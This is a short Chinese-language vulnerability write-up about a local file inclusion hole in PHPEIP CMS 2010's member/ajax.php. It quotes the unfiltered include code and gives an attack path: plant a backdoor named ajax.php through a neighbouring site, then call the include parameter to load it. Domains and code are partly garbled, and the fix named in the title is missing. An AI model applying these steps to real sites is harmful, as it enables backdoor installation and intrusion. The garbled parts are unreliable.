测试版本:PHPEIP内容管理系统CMS 2010
官网: HdhCmsTestphpeip测试数据
作者:随..风. Blog:http://hi.baidu测试数据/0daynet/
漏洞 页面:member/ajax.php
<?php error_reporting(0); if(!defined(' PHP EIP_AJAX_HEADER')){ chdir(''); HdhCmsTest2cto测试数据 require('includes/application_top.php'); define('PHPEIP_AJAX_HEADER','member/ajax.php'); require_once(DIR_FS_ROOT."xajax/xajax.inc.php"); $xajax = new xajax(eip_href_link($current_page)); if(isset($_GET['include'])&&is_array($_GET['include'])){ //include函数未过滤 By:随..风. foreach ($_GET['include'] as $includes) { if(file_exists(DIR_FS_ROOT.$includes.'/ajax.php')){ require_once(DIR_FS_ROOT.$includes.'/ajax.php'); //直接包含$include By:随..风. } }
......
?>
if( magic_quotes_ gpc =off){
}
或者旁注那个站上传个文件名为ajax.php的后门在根目录 然后直接 Http://HdhCmsTest2cto测试数据 /member/ajax.php?include=旁注网站目录
查看更多关于PHPEIP内容管理系统CMS 2010本地包含漏洞及修复 -的详细内容...